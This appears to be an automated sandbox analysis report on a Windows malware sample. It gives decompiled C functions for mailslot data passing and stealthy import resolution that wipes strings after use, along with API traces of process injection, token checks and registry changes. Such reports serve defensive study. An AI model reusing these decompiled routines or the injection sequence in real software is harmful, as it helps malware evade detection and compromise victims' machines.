  • GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 004016C9
    • Part of subcall function 00401593: VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004,00000000,757DC470,004016DC,?,?,00000000), ref: 004015B9
  • TerminateThread.KERNEL32(?,?,?,?,00000000), ref: 004016E7
  • CloseHandle.KERNEL32(?), ref: 004016F0
  • GetLastError.KERNEL32(?,?,00000000), ref: 004016F8
  • CloseHandle.KERNEL32(?), ref: 00401704
  • GetLastError.KERNEL32(?,00000000), ref: 0040170D
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 95
  • API ID: GetLastErrorSleep$CloseHandleCreateFileWriteFilememset
  • String ID: \\.\mailslot\msl0
  • API String ID: 1001206095-622273203
  • Opcode ID: 003b2913688191ea114162166813de589c119e69325853280e698207d87bc8a2
  • Instruction ID: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
  • Opcode Fuzzy Hash: DFF02E85425EC28BC77E20443911BE16086B782F42C6CC3B29ED2342AB8F40710A9746
  • Instruction Fuzzy Hash: 6dc92bda76e28a418efa52e27c72979e107b0f2e7ea2b6cd6c2c179023bdd981
C-Code - Quality: 94%
			E004010FB(void* __ebx, void* __edi, void* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _v24;
				void* _t28;
				void* _t34;
				int _t39;
				long _t40;
				long _t43;
				void* _t45;
				long _t46;
				void* _t48;
				void* _t52;

				_t48 = __edi;
				_t45 = __ebx;
				_v8 = 0;
				do {
					_t28 = CreateFileA("\\\\.\\mailslot\\msl0", 0x40000000, 3, 0, 3, 0, 0); // executed
					_v20 = _t28;
					if(_t28 != 0xffffffff) {
						_v12 = 0;
					} else {
						_v12 = GetLastError();
						Sleep(0x64);
					}
				} while (_v12 == 2);
				if(_v12 != 0) {
					L19:
					return _v12;
				}
				_t34 = E0040171F( *_a4,  &_a4,  &_v24); // executed
				if(_t34 == 0) {
					_v12 = 0xb;
					L18:
					CloseHandle(_v20);
					goto L19;
				}
				_t52 = _a4;
				_push(_t45);
				_t46 = _v24;
				_push(_t48);
				do {
					_v16 = _t46;
					if(_t46 >= 0x1000) {
						_v16 = 0x1000;
					}
					_t39 = WriteFile(_v20, _v8 + _t52, _v16,  &_v16, 0); // executed
					if(_t39 == 0) {
						_t40 = GetLastError();
						_v12 = _t40;
						if(_t40 != 0x79) {
							break;
						}
					} else {
						_t43 = _v16;
						_v8 = _v8 + _t43;
						_t46 = _t46 - _t43;
						if(_t46 == 0 && _t43 == 0x1000) {
							_t46 = _t46 + 1;
							_v8 = _v8 - 1;
						}
					}
					Sleep(0x64); // executed
				} while (_t46 != 0);
				memset(_t52, 0, _v8);
				E00401207(_t52);
				goto L18;
			}

APIs
  • CreateFileA.KERNEL32(\\.\mailslot\msl0,40000000,00000003,00000000,00000003,00000000,00000000), ref: 00401118
  • GetLastError.KERNEL32 ref: 00401126
  • Sleep.KERNEL32(00000064), ref: 00401131
    • Part of subcall function 0040171F: memcpy.NTDLL(?,?,?,?,?,00000000), ref: 00401806
  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0040118A
  • GetLastError.KERNEL32(?,?,00000002,?), ref: 004011A8
  • Sleep.KERNELBASE(00000064,?,?,00000002,?), ref: 004011B8
  • memset.NTDLL ref: 004011C8
    • Part of subcall function 00401207: HeapFree.KERNEL32(00000000,00401589,00401589), ref: 00401213
  • CloseHandle.KERNEL32(?), ref: 004011E4
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 182
  • API ID: HeapFreePathFindFileNameRegCloseKeyRegOpenKeyExRegQueryValueExRtlAllocateHeapStrStrIlstrcmpilstrlen
  • String ID:
  • API String ID: 1756712956-0
  • Opcode ID: f2f8398e5a378612a0451dc2799ca230d083f10daad558b8caa29df948c1a906
  • Instruction ID: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
  • Opcode Fuzzy Hash: 73F027808E89B3CAC953D045D9CE7B64644BF90B5FC8C13A02480291551F6034EB3B5D
  • Instruction Fuzzy Hash: 30042301f3adacd9a37cbdbd114ab521d6accad2819432d9e9ed4dab324ad14b
APIs
  • PathFindFileNameW.SHLWAPI(002E618C), ref: 002E1246
  • lstrcmpiW.KERNEL32(00000000,?,002E7494), ref: 002E124D
  • RegOpenKeyExA.KERNEL32(80000001,002E8080,00000000,00000000,?,?,002E7494), ref: 002E127E
  • lstrlenW.KERNEL32(?,002E7494), ref: 002E1292
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 002E12AA
  • RegQueryValueExW.KERNEL32(?,00000000,002E7494,00000000,002E7494,?,002E7494), ref: 002E12C9
  • StrStrIW.SHLWAPI(00000000), ref: 002E12E4
  • HeapFree.KERNEL32(00000000,00000000), ref: 002E12F9
  • RegCloseKey.ADVAPI32(?,?,002E7494), ref: 002E1302
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 143
  • API ID: lstrlenmemset$GetProcAddressLoadLibrary
  • String ID: ~
  • API String ID: 3655391705-1707062198
  • Opcode ID: 23239c877e3e9023a5525b3a16ecfaaed23ea4db6e96668c4a9e8c62ae4ebe7f
  • Instruction ID: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
  • Opcode Fuzzy Hash: EFF0590D195F71C6E16D6405187B7AA7082F39270BD14E9070193B31076880B3242F8C
  • Instruction Fuzzy Hash: 921aa9c309e3062a7c0ff89a2649ec636ea75a0e194a81e600035f3a1db56f11
C-Code - Quality: 100%
			E00401389(void* __edi, intOrPtr _a4) {
				_Unknown_base(*)()* _v4;
				intOrPtr _v8;
				struct HINSTANCE__* _v12;
				signed int _v16;
				intOrPtr _t23;
				struct HINSTANCE__* _t24;
				intOrPtr _t27;
				intOrPtr _t28;
				_Unknown_base(*)()* _t29;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr _t35;
				void* _t42;
				CHAR* _t44;
				intOrPtr* _t46;
				CHAR* _t49;
				signed int* _t50;
				intOrPtr _t57;

				_t42 = __edi;
				_t50 =  &_v16;
				_v16 = _v16 & 0x00000000;
				_t33 =  *((intOrPtr*)(_a4 + 0x80));
				if(_t33 == 0) {
					L23:
					return _v16;
				}
				_t34 = _t33 + __edi;
				_t23 =  *((intOrPtr*)(_t34 + 0xc));
				if(_t23 == 0) {
					goto L23;
				}
				while(1) {
					_t44 = _t23 + _t42;
					_t24 = LoadLibraryA(_t44); // executed
					_v12 = _t24;
					if(_t24 == 0) {
						break;
					}
					memset(_t44, 0, lstrlenA(_t44));
					_t27 =  *_t34;
					_t35 =  *((intOrPtr*)(_t34 + 0x10));
					_t50 =  &(_t50[3]);
					if(_t27 != 0) {
						L6:
						_t46 = _t27 + _t42;
						_t28 =  *_t46;
						if(_t28 == 0) {
							L19:
							_t23 =  *((intOrPtr*)(_t34 + 0x20));
							_t34 = _t34 + 0x14;
							if(_t23 != 0) {
								continue;
							}
							L22:
							goto L23;
						}
						_v8 = _t35 - _t46 + _t42;
						_t57 = _t28;
						L8:
						L8:
						if(_t57 < 0) {
							if(_t28 < _t42 || _t28 >=  *((intOrPtr*)(_a4 + 0x50)) + _t42) {
								_t28 = 0;
							}
						} else {
							_t28 = _t28 + _t42;
						}
						_t11 = _t28 + 2; // 0x2
						_t49 = _t11;
						_t29 = GetProcAddress(_v12, _t49);
						_v4 = _t29;
						if(_t29 == 0) {
							goto L18;
						}
						if(_t49 >= 0) {
							memset(_t49, 0, lstrlenA(_t49));
							_t50 =  &(_t50[3]);
						}
						 *(_v8 + _t46) = _v4;
						_t46 = _t46 + 4;
						_t28 =  *_t46;
						if(_t28 != 0) {
							goto L8;
						} else {
							goto L19;
						}
						L18:
						_v16 = 0x7f;
						goto L19;
					}
					_t27 = _t35;
					if(_t35 == 0) {
						goto L19;
					}
					goto L6;
				}
				_v16 = 0x7e;
				goto L22;
			}

APIs
  • LoadLibraryA.KERNEL32(?), ref: 004013B6
  • lstrlenA.KERNEL32(?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 004013C9
  • memset.NTDLL ref: 004013D3
  • GetProcAddress.KERNEL32(?,00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 0040141E
  • lstrlenA.KERNEL32(00000002,?,?,?,?,004015E0,?,00000000,?,?,?,00000000), ref: 00401431
  • memset.NTDLL ref: 0040143B
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 204
  • API ID: GetTokenInformation$CloseHandleGetSidSubAuthorityGetSidSubAuthorityCountOpenProcessToken
  • String ID:
  • API String ID: 1755075983-0
  • Opcode ID: 12516916b99b4340f23e0e34973497135c3864d70b9c27df362c3fff36d6cf3a
  • Instruction ID: a037660959a659f5c3f904b5512dd759339b8539fa4e822d2db2cd3d0e1b79dd
  • Opcode Fuzzy Hash: 3EE02B810ECBC2DBA65F340445C0B6171E5FF20A05C8D1F605421AA1A65E3030677EAF
  • Instruction Fuzzy Hash: a037660959a659f5c3f904b5512dd759339b8539fa4e822d2db2cd3d0e1b79dd
APIs
  • OpenProcessToken.ADVAPI32(000000FF,00020008,002E7494,00000000), ref: 002E3F6C
  • GetTokenInformation.KERNELBASE(002E7494,00000014,00000001,00000004,?,00000000), ref: 002E3F8C
  • GetTokenInformation.KERNELBASE(002E7494,00000019,00000000,00000000,?), ref: 002E3F9C
  • CloseHandle.KERNEL32(002E7494), ref: 002E3FEC
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • GetTokenInformation.KERNELBASE(002E7494,00000019,00000000,?,?,?,002E618C), ref: 002E3FBF
  • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 002E3FC7
  • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 002E3FD7
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 199
  • API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
  • String ID:
  • API String ID: 2400451634-0
  • Opcode ID: 20a1fe1949787535bd79f47ccd9ae32a5e8064993f8506e11f38a0a49419feba
  • Instruction ID: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
  • Opcode Fuzzy Hash: E2E02B881E4839C7857E180AD1DCF7102617FE1A5D9DC93511254561614F1DA0F77E8C
  • Instruction Fuzzy Hash: e3622a5643dd5bc20198795b8622ff9421b7fcc2ec09b542b244e7cafd184775
APIs
  • InterlockedIncrement.KERNEL32(002E7448), ref: 002E10B0
  • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 002E10C5
    • Part of subcall function 002E1000: memcpy.NTDLL(002E7570,?,0000000C,002E6248,0000000C,002E10E9,?,00000000,?), ref: 002E1038
  • CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 002E10F1
  • InterlockedDecrement.KERNEL32(002E7448), ref: 002E1109
  • SleepEx.KERNEL32(00000064,00000001), ref: 002E1125
  • CloseHandle.KERNEL32 ref: 002E1141
  • HeapDestroy.KERNEL32 ref: 002E114E
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 190
  • API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
  • String ID: \\.\mailslot\msl0
  • API String ID: 2393858888-622273203
  • Opcode ID: a3ceb4dbf8eec70be79f35f386a0360ab8bfc7ba483ab19be25d62c214bd66f1
  • Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
  • Opcode Fuzzy Hash: 18E026820629C5C6567F100A28013B360CBBB7174BDDEE7600AA7391830F823017964A
  • Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
C-Code - Quality: 96%
			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0;
				_v8 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000);
					if(_t36 == 0) {
						L10:
						_v8 = 8;
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									_v16 = 0x1000;
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000);
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36;
					 *((intOrPtr*)(_t27 + 8)) = _t39;
				}
				return _v8;
			}

APIs
  • CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
  • GetLastError.KERNEL32 ref: 004010D6
    • Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,00000000,00401543,00000208,00000000,?,004015FD,?,00000000,?,00000000,?,?,?,00000000), ref: 004011FE
  • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
  • HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
  • GetLastError.KERNEL32 ref: 004010A4
  • Sleep.KERNELBASE(00000064), ref: 004010B7
  • CloseHandle.KERNEL32(?), ref: 004010CE
Strings
Memory Dump Source
  • Source File: 00000001.00000002.556307441.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000001.00000002.556294553.00400000.00000002.sdmp
  • Associated: 00000001.00000002.556320972.00402000.00000002.sdmp
  • Associated: 00000001.00000002.556334181.00403000.00000004.sdmp
  • Associated: 00000001.00000002.556350474.00404000.00000008.sdmp
Similarity
  • Total matches: 194
  • API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
  • String ID:
  • API String ID: 1233022807-0
  • Opcode ID: 4e81c09fe99e8d89ea399b534ce1bd7a993d4de009fd61985864dbb219ec32a9
  • Instruction ID: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
  • Opcode Fuzzy Hash: A4D05E6E0C193ED1C1532416D8D6B2527027F6194EA4C1C322A8925217EFF471DFCB3D
  • Instruction Fuzzy Hash: 8c57d43649105a239ec27ab4fc75b28ccded34715bd5cff50f2d32245f2fdfca
APIs
  • CreateFileW.KERNEL32(002E74BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 002E1689
  • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E169F
  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,002E7494), ref: 002E16B7
  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,002E7494), ref: 002E16C9
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16D7
  • GetLastError.KERNEL32(?,00000000,?,002E7494), ref: 002E16E4
  • GetLastError.KERNEL32(?,002E7494), ref: 002E16F3
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 307
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 307323562-0
  • Opcode ID: c27f9509d813d6daf3205bb55a255c7f03bb055f708febb10643d95fc60cc1d5
  • Instruction ID: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
  • Opcode Fuzzy Hash: 6C017B4E066E93C6E9662240A651FB19381BF43A74E8E9B3642B1213DA5F54B00F970D
  • Instruction Fuzzy Hash: f1cfcadc64cec382ba735aa2127b2eee987ae4568dc6c5c5b5c389fb459ceaed
APIs
  • memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
    • Part of subcall function 002E3DE6: NtReadVirtualMemory.NTDLL(?,00000004,002E24C1,002E24C1,00000000,00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084), ref: 002E3E04
    • Part of subcall function 002E3DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 002E3E13
    • Part of subcall function 002E3DE6: SetLastError.KERNEL32(00000000,?,002E2351,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E3E1A
  • ResumeThread.KERNELBASE(?), ref: 002E2418
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,002E2370,00000000,002E24C1,CCCCFEEB,00000000,002E24C1), ref: 002E1A4D
    • Part of subcall function 002E1A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,002E24C1,00000004,?,?,?,?,002E2370,00000000,002E24C1), ref: 002E1A81
  • ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
  • WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
  • SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E3DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E3DDD
    • Part of subcall function 002E2175: memset.NTDLL ref: 002E21A3
    • Part of subcall function 002E2175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 002E222D
    • Part of subcall function 002E2175: WaitForSingleObject.KERNEL32(00000064), ref: 002E223B
    • Part of subcall function 002E2175: SuspendThread.KERNEL32(?), ref: 002E224E
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1DE0
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,002E23F9,?,002E23F9,002E23F9,?,?,?,?,00000000), ref: 002E1E2F
    • Part of subcall function 002E1CB2: memcpy.NTDLL(?,002E24F9,00000800,?,?,?,00000000), ref: 002E1E9F
    • Part of subcall function 002E1CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 002E1ECA
    • Part of subcall function 002E1CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 002E1ED1
    • Part of subcall function 002E1CB2: CloseHandle.KERNEL32(00000000), ref: 002E1EE0
    • Part of subcall function 002E1CB2: memset.NTDLL ref: 002E1EF4
  • GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 154
  • API ID: CloseHandleGetLastError$CreateRemoteThreadOpenProcess
  • String ID:
  • API String ID: 2418253885-0
  • Opcode ID: fc6ed82c56bfa57ab6fc962b82ba81a2bd1eb2d9df591a1fbb7d31c039fc64dc
  • Instruction ID: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
  • Opcode Fuzzy Hash: 1CE055000D66E7C19832E052E490BB2A246FE0120EA8C2B30022C24723AF0935572A8C
  • Instruction Fuzzy Hash: 2c59bf9fd095a6a154c166d1de637fec8a0963239cb22c2ae0ed4b07e56e9f65
APIs
    • Part of subcall function 002E32C5: GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
    • Part of subcall function 002E32C5: GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
    • Part of subcall function 002E32C5: OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
    • Part of subcall function 002E32C5: IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
    • Part of subcall function 002E32C5: CloseHandle.KERNEL32(002E74A4), ref: 002E3331
  • OpenProcess.KERNEL32(001F0FFF,00000000,002E15DA,002E15DA,C000009A,002E7494,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E2452
  • CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24AC
  • GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24CE
    • Part of subcall function 002E22D2: memset.NTDLL ref: 002E22F5
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?,00000000,002E24C1,CCCCFEEB,00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E2380
    • Part of subcall function 002E22D2: WaitForSingleObject.KERNEL32(00000064), ref: 002E238E
    • Part of subcall function 002E22D2: SuspendThread.KERNELBASE(?), ref: 002E23A1
    • Part of subcall function 002E22D2: GetLastError.KERNEL32(00000000,002E24C1,002E24C1,00000004,?,00000000,00000000,002E6084,00000000), ref: 002E240D
    • Part of subcall function 002E22D2: ResumeThread.KERNELBASE(?), ref: 002E2418
  • CloseHandle.KERNEL32(002E15DA), ref: 002E24C6
  • CloseHandle.KERNEL32(?), ref: 002E24E0
  • GetLastError.KERNEL32(?,?,002E15DA,?,00000000,?,002E7494), ref: 002E24E8
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 223
  • API ID: CloseHandleGetModuleHandleGetProcAddressIsWow64ProcessOpenProcess
  • String ID:
  • API String ID: 2525968537-0
  • Opcode ID: 4e39e43a056f2dbc5d7c37fe404edc70e416bd2b8df7daf7df2d9869e76f3aeb
  • Instruction ID: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393
  • Opcode Fuzzy Hash: A5D05E444F5C37C94021B9D2E46EB7122D13EA02DD4CC31A11258609175F3132EB4A7D
  • Instruction Fuzzy Hash: 2669984e2993e946f45bcfa7194f2494cfbb83a06d855a5a0d403690f303e393
APIs
  • GetModuleHandleA.KERNEL32(002E811F,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E32DF
  • GetProcAddress.KERNEL32(00000000,002E865C,?,?,002E1790,00000000,?,002E7494), ref: 002E32F0
  • OpenProcess.KERNEL32(00000400,00000000,002E7494,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E330D
  • IsWow64Process.KERNELBASE(002E74A4,?,002E618C,0000000C,?,?,002E1790,00000000,?,002E7494), ref: 002E331E
  • CloseHandle.KERNEL32(002E74A4), ref: 002E3331
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 294
  • API ID: RegCloseKeyRegEnumKeyExRegOpenKeyExWaitForSingleObject
  • String ID:
  • API String ID: 748258982-0
  • Opcode ID: 34aa78697289c7e337ace2860545490defdbd3f605ccc2af44dba403dee5d043
  • Instruction ID: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
  • Opcode Fuzzy Hash: D1F0C0450B6CC357C42B90426F92772D241EF218C8C8C67556BB87D2FA0D207193512B
  • Instruction Fuzzy Hash: b2117792a550c765d34f83fffc2248c31990b78765c7e4c07fd96cf57681afa6
APIs
  • RegOpenKeyExA.KERNEL32(80000003,00000000,00000000,?,?,00000000,000000B7,?,?,00000000,?,?,002E7494), ref: 002E4244
    • Part of subcall function 002E115C: RtlAllocateHeap.NTDLL(00000000,?,002E3CA0), ref: 002E1168
  • RegEnumKeyExA.KERNEL32(?,?,?,002E7494,00000000,00000000,00000000,00000000,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E428B
  • WaitForSingleObject.KERNEL32(00000000,?), ref: 002E42F8
    • Part of subcall function 002E1171: HeapFree.KERNEL32(00000000,?,002E3D05), ref: 002E117D
    • Part of subcall function 002E2E04: StrChrA.SHLWAPI(002E7494,0000005F), ref: 002E2E47
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E7494), ref: 002E2E5F
    • Part of subcall function 002E2E04: RegOpenKeyA.ADVAPI32(?,?,00000000), ref: 002E2E95
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2EBB
    • Part of subcall function 002E2E04: lstrlenW.KERNEL32 ref: 002E2ECC
    • Part of subcall function 002E2E04: RtlAllocateHeap.NTDLL(00000000,002E74CA), ref: 002E2EE1
    • Part of subcall function 002E2E04: RegQueryValueExW.KERNEL32(00000000,002E81C0,00000000,?,00000000,002E7494), ref: 002E2F06
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F2A
    • Part of subcall function 002E2E04: CreateDirectoryW.KERNELBASE(00000000,00000000), ref: 002E2F3C
    • Part of subcall function 002E2E04: lstrcmpiW.KERNEL32(00000000), ref: 002E2F53
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,002E80FA), ref: 002E2F95
    • Part of subcall function 002E2E04: lstrcpy.KERNEL32(?,?), ref: 002E2FEE
    • Part of subcall function 002E2E04: RegCreateKeyA.ADVAPI32(?,?,?), ref: 002E3002
    • Part of subcall function 002E2E04: RegQueryValueExA.KERNEL32(?,002E8256,00000000,?,?,002E7494), ref: 002E3025
    • Part of subcall function 002E2E04: RegOpenKeyExA.ADVAPI32(?,?,00000000,B.,?,?,?,?), ref: 002E3088
    • Part of subcall function 002E2E04: RegOpenKeyW.ADVAPI32(?,00000000,?), ref: 002E30A3
    • Part of subcall function 002E2E04: RegDeleteValueW.ADVAPI32(?,002E7560), ref: 002E30B1
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30BA
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(?), ref: 002E30C3
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,002E7494,?), ref: 002E30D8
    • Part of subcall function 002E2E04: HeapFree.KERNEL32(00000000,00000000), ref: 002E30FB
    • Part of subcall function 002E2E04: RegCloseKey.ADVAPI32(00000000), ref: 002E310D
  • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,00000000,?,?,002E7494), ref: 002E4320
Memory Dump Source
  • Source File: 00000001.00000002.556189649.002E1000.00000020.sdmp, Offset: 002E1000, based on PE: false
Similarity
  • Total matches: 385
  • API ID: CloseHandleCreateFileReadFileSetFilePointer
  • String ID:
  • API String ID: 3466452087-0
  • Opcode ID: 02226af8252c5962bd8a1246e83dd3874d4324e234fa97607c7506bcccf428ae
  • Instruction ID: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
  • Opcode Fuzzy Hash: 73E026442E9D83CDC6535584D842B36B370E3A060AD9CA7724708AF2329F2A3127DF3E
  • Instruction Fuzzy Hash: 0b1efe8f82c14c9c115ac041850c3d7abbae31b8c88273cc80ee50ce97004722
APIs
    • Part of subcall function 002E3C8B: GetModuleFileNameW.KERNEL32(002E7494,00000000,00000104,00000208,002E618C,0000000C,?,?,002E2A88,?,00000001,002E618C,0000000C,00000000), ref: 002E3CB1
